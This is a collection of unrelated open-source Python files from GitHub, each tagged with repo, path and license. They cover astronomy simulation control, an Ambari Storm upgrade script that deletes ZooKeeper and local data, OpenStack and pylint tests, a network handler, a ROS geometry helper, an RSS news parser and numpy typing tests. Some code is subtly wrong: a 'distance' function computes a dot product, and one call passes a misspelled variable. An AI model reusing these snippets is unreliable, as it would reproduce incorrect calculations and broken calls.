# Read in PBS-specific config
policy = ConfigParser.RawConfigParser()
policy.read(imsim_config_file)
preprocessor.script_writer.ParsePbsConfig(policy)
else:
logger.critical('Unknown scheduler: %s. Use -h or --help for help',
scheduler)
return 1
preprocessor.InitExecEnvironment()
with PhosimUtil.WithTimer() as t:
if not preprocessor.DoPreprocessing(skip_atmoscreens=skip_atmoscreens):
logger.critical('DoPreprocessing() failed.')
return 1
t.LogWall('DoPreprocessing')
exec_manifest_fn = 'execmanifest_raytrace_%s.txt' % preprocessor.focalplane.observationID
files_to_stage = preprocessor.ArchiveRaytraceInputByExt(exec_archive_name=exec_manifest_fn)
if not files_to_stage:
logger.critical('Output archive step failed.')
return 1
with PhosimUtil.WithTimer() as t:
preprocessor.StageOutput(files_to_stage)
t.LogWall('StageOutput')
if not keep_scratch_dirs:
preprocessor.Cleanup()
verifier = PhosimVerifier.PreprocVerifier(imsim_config_file, trimfile,
extra_commands)
missing_files = verifier.VerifySharedOutput()
if missing_files:
logger.critical('Verification failed with the following files missing:')
for fn in missing_files:
logger.critical(' %s', fn)
sys.stderr.write('Verification failed with the following files missing:\n')
for fn in missing_files:
sys.stderr.write(' %s\n', fn)
else:
logger.info('Verification completed successfully.')
return 0
def ConfigureLogging(trimfile, policy, log_to_stdout, imsim_config_file,
extra_commands=None):
"""Configures logger.
If log_to_stdout, the logger will write to stdout. Otherwise, it will
write to:
'log_dir' in the config file, if present
/tmp/fullFocalplane.log if 'log_dir' is not present.
Stdout from phosim.py and PhoSim binaries always goes to stdout.
"""
if log_to_stdout:
log_fn = None
else:
if policy.has_option('general', 'log_dir'):
# Log to file in log_dir
obsid, filter_num = PhosimManager.ObservationIdFromTrimfile(
trimfile, extra_commands=options.extra_commands)
log_dir = os.path.join(policy.get('general', 'log_dir'), obsid)
log_fn = os.path.join(log_dir, 'fullFocalplane_%s.log' % obsid)
else:
log_fn = '/tmp/fullFocalplane.log'
PhosimUtil.ConfigureLogging(policy.getint('general', 'debug_level'),
logfile_fullpath=log_fn)
params_str = 'trimfile=%s\nconfig_file=%s\n' % (trimfile, imsim_config_file)
if extra_commands:
params_str += 'extra_commands=%s\n' % extra_commands
PhosimUtil.WriteLogHeader(__file__, params_str=params_str)
def main(trimfile, imsim_config_file, extra_commands, skip_atmoscreens,
keep_scratch_dirs, sensor_ids, log_to_stdout=False):
"""
Run the fullFocalplanePbs.py script, populating it with the
correct user and cluster job submission information from an LSST
policy file.
"""
policy = ConfigParser.RawConfigParser()
policy.read(imsim_config_file)
if policy.has_option('general', 'phosim_version'):
phosim_version = policy.get('general', 'phosim_version')
else:
phosim_version = '3.0.1'
ConfigureLogging(trimfile, policy, log_to_stdout,
imsim_config_file, extra_commands)
# print 'Running fullFocalPlane on: ', trimfile
logger.info('Running fullFocalPlane on: %s ', trimfile)
# print 'Using Imsim/Phosim version', phosim_version
logger.info('Using Imsim/Phosim version %s', phosim_version)
# Must pass absolute paths to imsim/phosim workers
if not os.path.isabs(trimfile):
trimfile = os.path.abspath(trimfile)
if not os.path.isabs(imsim_config_file):
imsim_config_file = os.path.abspath(imsim_config_file)
if not os.path.isabs(extra_commands):
extra_commands = os.path.abspath(extra_commands)
scheduler = policy.get('general','scheduler2')
if version.LooseVersion(phosim_version) < version.LooseVersion('3.1.0'):
if len(sensor_ids.split('|')) > 1:
logger.critical('Multiple sensors not supported in version < 3.1.0.')
return 1
sensor_id = '' if sensor_ids == 'all' else sensor_ids
return DoPreprocOldVersion(trimfile, policy, extra_commandsm,scheduler,
sensor_id)
elif version.LooseVersion(phosim_version) > version.LooseVersion('3.2.0'):
if sensor_ids != 'all':
logger.critical('Single exposure mode is currently not supported for'
' phosim > 3.2.0')
return 1
return DoPreproc(trimfile, imsim_config_file, extra_commands, scheduler,
skip_atmoscreens=skip_atmoscreens,
keep_scratch_dirs=keep_scratch_dirs)
logger.critical('Unsupported phosim version %s', phosim_version)
return 1
if __name__ == '__main__':
usage = 'usage: %prog trimfile imsim_config_file [options]'
parser = OptionParser(usage=usage)
parser.add_option('-a', '--skip_atmoscreens', dest='skip_atmoscreens',
action='store_true', default=False,
help='Generate atmospheric screens in raytrace stage instead'
' of preprocessing stage.')
parser.add_option('-c', '--command', dest='extra_commands',
help='Extra commands filename.')
parser.add_option('-k', '--keep_scratch', dest='keep_scratch_dirs',
action='store_true', default=False,
help='Do not cleanup working directories.'
' (version 3.2.x and higher only).')
parser.add_option('-l', '--logtostdout', dest='log_to_stdout',
action='store_true', default=False,
help='Write logging output to stdout instead of log file'
' (version 3.2.x and higher only).')
parser.add_option('-s', '--sensor', dest='sensor_ids', default='all',
help='Specify a list of sensor ids to use delimited by "|",'
' or use "all" for all.')
(options, args) = parser.parse_args()
if len(args) != 2:
print 'Incorrect number of arguments. Use -h or --help for help.'
print usage
quit()
trimfile = args[0]
imsim_config_file = args[1]
sys.exit(main(trimfile, imsim_config_file, options.extra_commands,
options.skip_atmoscreens, options.keep_scratch_dirs,
options.sensor_ids, options.log_to_stdout))
| lsst-sims/sims_phosim_pythoncontrol | fullFocalplane.py | Python | gpl-3.0 | 11,426 |
from syncloudlib.linux import useradd
def test_useradd():
assert True | syncloud/lib | test/test_linux.py | Python | gpl-3.0 | 74 |
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import ambari_simplejson as json # simplejson is much faster comparing to Python 2.6 json module and has the same functions set.
import os
from ambari_commons import yaml_utils
from resource_management.core.logger import Logger
from resource_management.core.exceptions import Fail
from resource_management.core.resources.system import Directory
from resource_management.core.resources.system import File
from resource_management.core.resources.system import Execute
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions.default import default
class StormUpgrade(Script):
"""
This class helps perform some of the upgrade tasks needed for Storm during
a non-rolling upgrade. Storm writes data to disk locally and to ZooKeeper.
If any HDP 2.2 bits exist in these directories when an HDP 2.3 instance
starts up, it will fail to start properly. Because the upgrade framework in
Ambari doesn't yet have a mechanism to say "stop all" before starting to
upgrade each component, we need to rely on a Storm trick to bring down
running daemons. By removing the ZooKeeper data with running daemons, those
daemons will die.
"""
def delete_storm_zookeeper_data(self, env):
"""
Deletes the Storm data from ZooKeeper, effectively bringing down all
Storm daemons.
:return:
"""
import params
Logger.info('Clearing Storm data from ZooKeeper')
storm_zookeeper_root_dir = params.storm_zookeeper_root_dir
if storm_zookeeper_root_dir is None:
raise Fail("The storm ZooKeeper directory specified by storm-site/storm.zookeeper.root must be specified")
# the zookeeper client must be given a zookeeper host to contact
storm_zookeeper_server_list = yaml_utils.get_values_from_yaml_array(params.storm_zookeeper_servers)
if storm_zookeeper_server_list is None:
Logger.info("Unable to extract ZooKeeper hosts from '{0}', assuming localhost").format(params.storm_zookeeper_servers)
storm_zookeeper_server_list = ["localhost"]
# for every zk server, try to remove /storm
zookeeper_data_cleared = False
for storm_zookeeper_server in storm_zookeeper_server_list:
# determine where the zkCli.sh shell script is
zk_command_location = "/usr/hdp/current/zookeeper-client/bin/zkCli.sh"
if params.version is not None:
zk_command_location = "/usr/hdp/{0}/zookeeper/bin/zkCli.sh".format(params.version)
# create the ZooKeeper delete command
command = "{0} -server {1}:{2} rmr /storm".format(
zk_command_location, storm_zookeeper_server, params.storm_zookeeper_port)
# clean out ZK
try:
# the ZK client requires Java to run; ensure it's on the path
env_map = {
'JAVA_HOME': params.java64_home
}
# AMBARI-12094: if security is enabled, then we need to tell zookeeper where the
# JAAS file is located since we don't use kinit directly with STORM
if params.security_enabled:
env_map['JVMFLAGS'] = "-Djava.security.auth.login.config={0}".format(params.storm_jaas_file)
Execute(command, user=params.storm_user, environment=env_map,
logoutput=True, tries=1)
zookeeper_data_cleared = True
break
except:
# the command failed, try a different ZK server
pass
# fail if the ZK data could not be cleared
if not zookeeper_data_cleared:
raise Fail("Unable to clear ZooKeeper Storm data on any of the following ZooKeeper hosts: {0}".format(
storm_zookeeper_server_list))
def delete_storm_local_data(self, env):
"""
Deletes Storm data from local directories. This will create a marker file
with JSON data representing the upgrade stack and request/stage ID. This
will prevent multiple Storm components on the same host from removing
the local directories more than once.
:return:
"""
import params
Logger.info('Clearing Storm data from local directories...')
storm_local_directory = params.local_dir
if storm_local_directory is None:
raise Fail("The storm local directory specified by storm-site/storm.local.dir must be specified")
request_id = default("/requestId", None)
stage_id = default("/stageId", None)
stack_version = params.version
stack_name = params.stack_name
json_map = {}
json_map["requestId"] = request_id
json_map["stageId"] = stage_id
json_map["stackVersion"] = stack_version
json_map["stackName"] = stack_name
temp_directory = params.tmp_dir
upgrade_file = os.path.join(temp_directory, "storm-upgrade-{0}.json".format(stack_version))
if os.path.exists(upgrade_file):
try:
with open(upgrade_file) as file_pointer:
existing_json_map = json.load(file_pointer)
if cmp(json_map, existing_json_map) == 0:
Logger.info("The storm upgrade has already removed the local directories for {0}-{1} for request {2} and stage {3}".format(
stack_name, stack_version, request_id, stage_id))
# nothing else to do here for this as it appears to have already been
# removed by another component being upgraded
return
except:
Logger.error("The upgrade file {0} appears to be corrupt; removing...".format(upgrade_file))
File(upgrade_file, action="delete")
else:
# delete the upgrade file since it does not match
File(upgrade_file, action="delete")
# delete from local directory
Directory(storm_local_directory, action="delete", recursive=True)
# recreate storm local directory
Directory(storm_local_directory, mode=0755, owner = params.storm_user,
group = params.user_group, recursive = True)
# the file doesn't exist, so create it
with open(upgrade_file, 'w') as file_pointer:
json.dump(json_map, file_pointer, indent=2)
if __name__ == "__main__":
StormUpgrade().execute() | zouzhberk/ambaridemo | demo-server/src/main/resources/common-services/STORM/0.9.1.2.1/package/scripts/storm_upgrade.py | Python | apache-2.0 | 6,720 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.network.v2 import security_group
from openstack.network.v2 import security_group_rule
from openstack.tests.functional import base
class TestSecurityGroupRule(base.BaseFunctionalTest):
IPV4 = 'IPv4'
PROTO = 'tcp'
PORT = 22
DIR = 'ingress'
ID = None
RULE_ID = None
def setUp(self):
super(TestSecurityGroupRule, self).setUp()
self.NAME = self.getUniqueString()
sot = self.conn.network.create_security_group(name=self.NAME)
assert isinstance(sot, security_group.SecurityGroup)
self.assertEqual(self.NAME, sot.name)
self.ID = sot.id
rul = self.conn.network.create_security_group_rule(
direction=self.DIR, ethertype=self.IPV4,
port_range_max=self.PORT, port_range_min=self.PORT,
protocol=self.PROTO, security_group_id=self.ID)
assert isinstance(rul, security_group_rule.SecurityGroupRule)
self.assertEqual(self.ID, rul.security_group_id)
self.RULE_ID = rul.id
def tearDown(self):
sot = self.conn.network.delete_security_group_rule(
self.RULE_ID, ignore_missing=False)
self.assertIsNone(sot)
sot = self.conn.network.delete_security_group(
self.ID, ignore_missing=False)
self.assertIsNone(sot)
super(TestSecurityGroupRule, self).tearDown()
def test_find(self):
sot = self.conn.network.find_security_group_rule(self.RULE_ID)
self.assertEqual(self.RULE_ID, sot.id)
def test_get(self):
sot = self.conn.network.get_security_group_rule(self.RULE_ID)
self.assertEqual(self.RULE_ID, sot.id)
self.assertEqual(self.DIR, sot.direction)
self.assertEqual(self.PROTO, sot.protocol)
self.assertEqual(self.PORT, sot.port_range_min)
self.assertEqual(self.PORT, sot.port_range_max)
self.assertEqual(self.ID, sot.security_group_id)
def test_list(self):
ids = [o.id for o in self.conn.network.security_group_rules()]
self.assertIn(self.RULE_ID, ids)
| ctrlaltdel/neutrinator | vendor/openstack/tests/functional/network/v2/test_security_group_rule.py | Python | gpl-3.0 | 2,605 |
import get,set,delete | ArnossArnossi/checkmate | checkmate/management/commands/props/__init__.py | Python | agpl-3.0 | 21 |
# neubot/handler.py
#
# Copyright (c) 2010-2012 Simone Basso <bassosimone@gmail.com>,
# NEXA Center for Internet & Society at Politecnico di Torino
#
# This file is part of Neubot <http://www.neubot.org/>.
#
# Neubot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Neubot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Neubot. If not, see <http://www.gnu.org/licenses/>.
#
''' Handles poller events '''
# Adapted from neubot/net/stream.py
# Python3-ready: yes
from neubot.connector import Connector
from neubot.listener import Listener
from neubot import utils_net
class Handler(object):
''' Event handler '''
# Inspired by BitTorrent handle class
def listen(self, endpoint, prefer_ipv6, sslconfig, sslcert):
''' Listen() at endpoint '''
sockets = utils_net.listen(endpoint, prefer_ipv6)
if not sockets:
self.handle_listen_error(endpoint)
return
for sock in sockets:
Listener(self, sock, endpoint, sslconfig, sslcert)
def handle_listen_error(self, endpoint):
''' Handle the LISTEN_ERROR event '''
def handle_listen(self, listener):
''' Handle the LISTEN event '''
def handle_listen_close(self, listener):
''' Handle the LISTEN_CLOSE event '''
def handle_accept(self, listener, sock, sslconfig, sslcert):
''' Handle the ACCEPT event '''
def handle_accept_error(self, listener):
''' Handle the ACCEPT_ERROR event '''
def connect(self, endpoint, prefer_ipv6, sslconfig, extra):
''' Connect() to endpoint '''
return Connector(self, endpoint, prefer_ipv6, sslconfig, extra)
def handle_connect_error(self, connector):
''' Handle the CONNECT_ERROR event '''
def handle_connect(self, connector, sock, rtt, sslconfig, extra):
''' Handle the CONNECT event '''
def handle_close(self, stream):
''' Handle the CLOSE event '''
| neubot/neubot-client | neubot/handler.py | Python | gpl-3.0 | 2,381 |
from pathlib import Path
import pytest
import pylint.extensions.empty_comment as empty_comment
@pytest.fixture(scope="module")
def checker():
return empty_comment.CommentChecker
@pytest.fixture(scope="module")
def enable():
return ["empty-comment"]
@pytest.fixture(scope="module")
def disable():
return ["all"]
def test_comment_base_case(linter):
comment_test = str(Path(__file__).parent.joinpath("data", "empty_comment.py"))
linter.check([comment_test])
msgs = linter.reporter.messages
assert len(msgs) == 4
for msg in msgs:
assert msg.symbol == "empty-comment"
assert msg.msg == "Line with empty comment"
assert msgs[0].line == 2
assert msgs[1].line == 3
assert msgs[2].line == 5
assert msgs[3].line == 7
| ruchee/vimrc | vimfiles/bundle/vim-python/submodules/pylint/tests/extensions/test_empty_comment.py | Python | mit | 781 |
#!/usr/bin/env python
import roslib
roslib.load_manifest('hri_api')
import math
from geometry_msgs.msg import Point
class GeomMath(object):
@staticmethod
def distance_between(p1, p2):
return math.sqrt(p1.x*p2.x + p1.y*p2.y + p1.z*p2.z)
@staticmethod
def is_infront_of(p1, p2):
if p1.x >= p2.x:
return True
return False
@staticmethod
def is_behind(p1, p2):
if p1.x < p2.x:
return True
return False
@staticmethod
def is_left_of(p1, p2):
if p1.y >= p2.y:
return True
return False
@staticmethod
def is_right_of(p1, p2):
if p1.y < p2.y:
return True
return False
| jdddog/hri | hri_api/src/hri_api/math/geom_math.py | Python | bsd-3-clause | 723 |
# -*- coding: utf-8 -*-
import sys
sys.path.insert(0, 'libs')
import urllib2
from datetime import datetime as dt
import logging
from time import mktime
import bs4
import feedparser
from collections import defaultdict
import models
#from google.appengine.api import urlfetch
#urlfetch.set_default_fetch_deadline(45)
import os
file_dir = os.path.dirname(os.path.abspath(__file__))
new_path = os.path.split(file_dir)[0]
sys.path.insert(0, new_path) # to get utils from root folder.. this might be obsolete
categories = [\
['Delfi','http://feeds2.feedburner.com/delfiuudised?format=xml'], \
['Delfi','http://feeds.feedburner.com/delfimaailm?format=xml'], \
['Delfi','http://feeds.feedburner.com/delfi110-112?format=xml'], \
['Delfi','http://feeds2.feedburner.com/delfimajandus'], \
['Postimees','http://majandus24.postimees.ee/rss'], # majandus \
['Postimees','http://www.postimees.ee/rss/'],\
['Postimees','http://www.postimees.ee/rss/?r=128'], # kirmi \
['ERR','http://www.err.ee/rss'],\
[u'Õhtuleht','http://www.ohtuleht.ee/rss'],\
['raamatupidaja.ee','http://raamatupidaja.ee/RSS.aspx'],\
[u'Päevaleht','http://feeds.feedburner.com/eestipaevaleht?format=xml'],\
['Eesti Ekspress','http://feeds.feedburner.com/EestiEkspressFeed?format=xml'],\
['Maaleht','http://feeds.feedburner.com/maaleht?format=xml'],\
[u'Äripäev','http://www.aripaev.ee/rss'],\
['juura.ee','http://juura.ee/gw.php/news/aggregate/index/format/xml'],\
[u'Деловное Деломости','http://dv.ee/rss'],\
[u'МК-Эстония','http://www.mke.ee/index.php?option=com_k2&view=itemlist&format=feed&type=rss'],\
#[u'äripäev','http://feeds.feedburner.com/aripaev-rss'], # old, also has results, but lags behind\
# ############################ \
['BBC','http://feeds.bbci.co.uk/news/rss.xml?edition=us'],\
['BBC','http://feeds.bbci.co.uk/news/rss.xml?edition=int'],\
['BBC','http://feeds.bbci.co.uk/news/rss.xml?edition=uk'],\
['TIME','http://time.com/newsfeed/feed/'],\
['Forbes','http://www.forbes.com/real-time/feed2/'],\
['CNN','http://rss.cnn.com/rss/edition.rss'],\
['New York Times','http://rss.nytimes.com/services/xml/rss/nyt/HomePage.xml'],\
['Reuters','http://feeds.reuters.com/reuters/businessNews?format=xml'],\
['The Economist','http://www.economist.com/sections/business-finance/rss.xml'],\
['Financial Times','http://www.ft.com/rss/home/uk'],\
['Business Insider','http://feeds2.feedburner.com/businessinsider'],\
['Bloomberg','http://www.bloombergview.com/rss'],\
['New York Post','http://nypost.com/feed/'],\
['The Guardian','http://www.theguardian.com/uk/rss'],\
['Forbes','http://www.forbes.com/real-time/feed2/'],\
['Deutche Welle','http://rss.dw.de/atom/rss-en-all'],\
['Helsingin Sanomat','http://www.helsinkitimes.fi/?format=feed&type=rss'],\
['Wall Street Journal','http://online.wsj.com/xml/rss/3_7014.xml'],\
['Wall Street Journal','http://online.wsj.com/xml/rss/3_7455.xml'],\
['MarketWatch','http://feeds.marketwatch.com/marketwatch/topstories?format=xml'],\
['MarketWatch','http://feeds.marketwatch.com/marketwatch/financial/'],\
#['physorgtech','http://phys.org/rss-feed/technology-news/'],\
# ################################ \
['Riigihanked','https://riigihanked.riik.ee/register/rss/Teated.html'], # SSL certificate failed \
['Riigikohtu uudised','http://www.nc.ee/rss/?uudised=1'],\
['Riigiteataja ilmumas/ilmunud seadused','https://www.riigiteataja.ee/ilmunud_ilmumas.xml'], #uberslow, fix with handler!!!! \
['Riigikogu pressiteated', 'http://feeds.feedburner.com/RiigikoguPressiteated?format=xml'],\
['eurlex kohtuasjad', 'http://eur-lex.europa.eu/ET/display-feed.rss?rssId=163'], # NB! siin on võimalik keelt muuta\
['eurlex komisjoni ettepanekud', 'http://eur-lex.europa.eu/ET/display-feed.rss?rssId=161'],\
[u'eurlex parlament ja nõukogu', 'http://eur-lex.europa.eu/ET/display-feed.rss?rssId=162'],\
['Eversheds Ots & Co' , 'http://www.eversheds.com/code/RSS/Estonia/Estonia/News.xml'],\
['Eversheds Ots & Co' , 'http://www.eversheds.com/code/RSS/Estonia/Estonia/Article.xml'],\
['Lawin' , 'http://www.lawin.ee/ee/uudised/rss/'],\
['Redbaltic' , 'http://www.redbaltic.com/est/rss/'],\
['Sorainen' , 'http://www.sorainen.com/et/RSS/language/et/content_module/All'],\
['Varul' , 'http://www.varul.com/uudised/uudised.rss'],\
['Kaitseministeerium' , 'http://www.kaitseministeerium.ee/et/rss-uudiste-voog'],\
['Finantsministeerium' , 'http://www.fin.ee/rss_uudised'], \
# #################### \
#['Majandusministeerium' , 'https://www.mkm.ee/et/news/all/feed'], ssl fail \
#['haridusministeerium' , 'https://www.hm.ee/et/news/all/feed' ]# ssl certificate - not allowed \
#['lextal' , 'http://www.lextal.ee/feed/' ] # doesn't work, has robots.txt \
['Hiljutised Riigikohtu lahendid','http://www.nc.ee/rss/?lahendid=1&tyyp=K'], # neid, mida muidu otsingust ei leia aga RSS'ist leiab, on dokument eemaldatud \
[u'Kooskõlastamiseks esitatud eelnõud','http://eelnoud.valitsus.ee/main/mount/rss/home/review.rss' ], \
[u'Valitsusele esitatud eelnõud','http://eelnoud.valitsus.ee/main/mount/rss/home/submission.rss' ] \
# ['bbc','http://feeds.bbci.co.uk/news/rss.xml?edition=int' ] \
]
from utils import *
# We need this because ordinary dictionaries can't have duplicate keys (check the case of delfi.ee)
cat_dict = defaultdict(list) # TODO! fix issue with dict removing duplicate keys (eg. multiple Postimees sources)
for listitem in categories:
cat_dict['categories'].append(listitem)
# add custom RSS categories to category list
datastore_results = models.CustomCategory.query(models.CustomCategory.category_type == 'rss_source').fetch()
if datastore_results:
for result in datastore_results:
cat_dict['categories'].append([result.category_name,result.category_link])
def parse_results_ilmumas(ilmumas_links,querywords):
results=[]
url_base='http://www.riigiteataja.ee/'
for a in ilmumas_links:
ourlink=a+'&kuvaKoik=true' # et kuvaks kõik tulemused (riigiteataja lehel pagination)
src=urllib2.urlopen(ourlink)
soup = bs4.BeautifulSoup(src.read())
soup = soup.find('tbody')
# down below is a duplicate cycle - could be rafactored
for q in querywords:
if ' ' in q: # if space in query, then search for all words
new_q=set(q.split(' ')) # add to a set
elif q=='':
new_q=''
else:
new_q=[q]
for result in soup.findAll("tr"):
cats=[]
if all([x2.lower() in unicode(result).lower() for x2 in new_q]): # kas märksõnad tulemuses?
if result.findAll('a'): # kui leiad lingi, tee uus pealkiri ning link (muidu läheb pekki)
newlink = url_base+result.a.get('href')
newtitle = result.a(text=True)[0]
for item in result.findAll("td"): # find columns
result2 = item.find_next(text=True)
result2 = re.sub('\n', '', result2.rstrip()) # don't know why I need this
cats.append(result2) # add results to list
# let's parse results
if not cats[0]: #
item_title=newtitle
item_title = item_title.replace("\t", "")
item_link=newlink
else:
item_title=cats[0]
item_title = item_title.replace("\t", "")
item_link=ourlink
""" Have to use some regex to extract dates """
if cats[1][0:5]=='RT I,':
match = re.search(r'(?<=^.{6}).*', cats[1])
elif cats[1][0:7]=='RT III,':
match = re.search(r'(?<=^.{8}).*', cats[1])
else:
match = re.search(r'(?<=^.{7}).*', cats[1])
item_date=str(match.group())[0:10]
results.append([item_link,item_title,sql_normalize_date(item_date),q,cats[2]])
# link, title, date, queryword, category
return results
def parse_feed(querywords, category, date_algus='2016-01-01'):
date_algus = datetime_object(date_algus)
results = []
for search_from in category.values.get('rss_sources'):
#logging.error(category.values.get('rss_sources'))
if unicode(category.name) == u'Riigiteataja ilmumas/ilmunud seadused': # juhul kui tegi riigiteataja ilumas/ilmunud, toimetame teisiti (neil RSS vana ja ei vasta standarditele)
try:
src2=urllib2.urlopen(search_from).read(5000) # timeout set (search from, timeout=60) because of default appengine limits (and since riigiteataja ilmumas takes long time to open otherwise too)
soup2 = bs4.BeautifulSoup(src2)
if soup2: # kui leiame tulemusi
limiter=10 # see on vajalik, sest app engine ei saa aru read(5000) limiidist, ning teeb kuni timeout'ini avamist
links_collection=[]
while limiter>0:
for link in soup2.findAll("link"):
if len(link.next)>50:
links_collection.append(link.next)
limiter-=1 # count down until 0 (optimization)
results.extend(parse_results_ilmumas(links_collection, querywords))
except Exception, e:
logging.error(e)
pass
else: # Tegu normaalsete RSSidega
try:
if category.name == 'Finantsministeerium':
search_from = urllib2.urlopen(search_from, timeout=40) # without timeout doesn't work
elif unicode(category.name) == u'Kooskõlastamiseks esitatud eelnõud':
search_from = urllib2.urlopen(search_from, timeout=40).read(5000)
d = feedparser.parse(search_from)
for a in d.entries:
for x in querywords:
result_title = None
if ' ' in x:
new_x = set(x.split(' ')) # add to a set
elif x == '':
new_x = ''
else:
new_x = [x]
try:
tiitel = a['title']
except Exception:
tiitel = ' '
pass
result_date = datetime.datetime.now().date()
if unicode(category.name) in ['eurlex kohtuasjad','eurlex komisjoni ettepanekud',u'eurlex parlament ja nõukogu']:
if result_date >= (date_algus if date_algus else result_date) and (x.lower() in tiitel.lower()):
result_title = tiitel
result_link = a['link']
results.append([result_link, result_title, str(result_date), x, category.name])
else:
""" Tavaline RSS """
try:
result_date = dt.fromtimestamp(mktime(a['published_parsed'])).date()
except Exception:
pass
if not result_date:
try:
result_date = a['published']
except Exception:
result_date = a['pubDate']
pass
# Sometimes we get empty blocks, let's catch them and pass
try:
summary = a.get('summary')
except Exception:
summary = ' '
pass
try:
title = a.get('title')
except Exception:
title = ' '
pass
try:
description = a.get('description')
except Exception:
description = ' '
pass
for queryword in new_x:
if queryword.decode('utf-8').lower() in title.lower():
result_title = title
elif queryword.decode('utf-8').lower() in description.lower():
result_title = description
elif queryword.decode('utf-8').lower() in summary.lower():
result_title = summary
if result_title:
if 'img ' in result_title:
break
result_title = result_title.replace('<p>','').replace('</p>','')
result_link = a['link']
results.append([result_link, result_title, str(result_date), x, category.name, 0])
except Exception,e:
logging.error(e)
pass
return results #results if results else None
# TESTING #####
if __name__ == "__main__":
#results=parse_feed(['president',u'jürgen ligi'],'postimees.ee','2014-01-01')
#results=parse_feed(['president'],'delfi.ee','2014-01-01')
#results=parse_feed([''],u'Valitsusele esitatud eelnõud','2015-11-25')
results=parse_feed([''],'bbc','2015-11-25')
#results=parse_feed(set([u'teenis']),'Finantsministeerium','2015-01-07')
#results=parse_feed('redbaltic',set([u'tunnistas']),'17.07.2014')
#results=parse_feed('lextal',set(['luik']),'01.01.2014') # doesn't work
#results=parse_feed('eurlex kohtuasjad',['Esimese'],'17.07.2014')
#results=parse_feed('riigiteataja ilmumas',[u'Keskkonna','seadme'],'17.07.2014')
print len(results)
for a in results:
print a, '\n' | kasparg/lawcats | parsers/rss_parse.py | Python | gpl-3.0 | 13,320 |
from typing import Any, List, TypeVar
import numpy as np
import numpy.typing as npt
_SCT = TypeVar("_SCT", bound=np.generic)
def func1(ar: npt.NDArray[_SCT], a: int) -> npt.NDArray[_SCT]:
pass
def func2(ar: npt.NDArray[np.number[Any]], a: str) -> npt.NDArray[np.float64]:
pass
AR_b: npt.NDArray[np.bool_]
AR_u: npt.NDArray[np.uint64]
AR_i: npt.NDArray[np.int64]
AR_f: npt.NDArray[np.float64]
AR_c: npt.NDArray[np.complex128]
AR_O: npt.NDArray[np.object_]
AR_LIKE_b: List[bool]
reveal_type(np.fliplr(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.fliplr(AR_LIKE_b)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.flipud(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.flipud(AR_LIKE_b)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.eye(10)) # E: numpy.ndarray[Any, numpy.dtype[{float64}]]
reveal_type(np.eye(10, M=20, dtype=np.int64)) # E: numpy.ndarray[Any, numpy.dtype[{int64}]]
reveal_type(np.eye(10, k=2, dtype=int)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.diag(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.diag(AR_LIKE_b, k=0)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.diagflat(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.diagflat(AR_LIKE_b, k=0)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.tri(10)) # E: numpy.ndarray[Any, numpy.dtype[{float64}]]
reveal_type(np.tri(10, M=20, dtype=np.int64)) # E: numpy.ndarray[Any, numpy.dtype[{int64}]]
reveal_type(np.tri(10, k=2, dtype=int)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.tril(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.tril(AR_LIKE_b, k=0)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.triu(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.triu(AR_LIKE_b, k=0)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.vander(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.signedinteger[Any]]]
reveal_type(np.vander(AR_u)) # E: numpy.ndarray[Any, numpy.dtype[numpy.signedinteger[Any]]]
reveal_type(np.vander(AR_i, N=2)) # E: numpy.ndarray[Any, numpy.dtype[numpy.signedinteger[Any]]]
reveal_type(np.vander(AR_f, increasing=True)) # E: numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]]
reveal_type(np.vander(AR_c)) # E: numpy.ndarray[Any, numpy.dtype[numpy.complexfloating[Any, Any]]]
reveal_type(np.vander(AR_O)) # E: numpy.ndarray[Any, numpy.dtype[numpy.object_]]
reveal_type(np.histogram2d(AR_i, AR_b)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{float64}]], numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]], numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]]]
reveal_type(np.histogram2d(AR_f, AR_f)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{float64}]], numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]], numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]]]
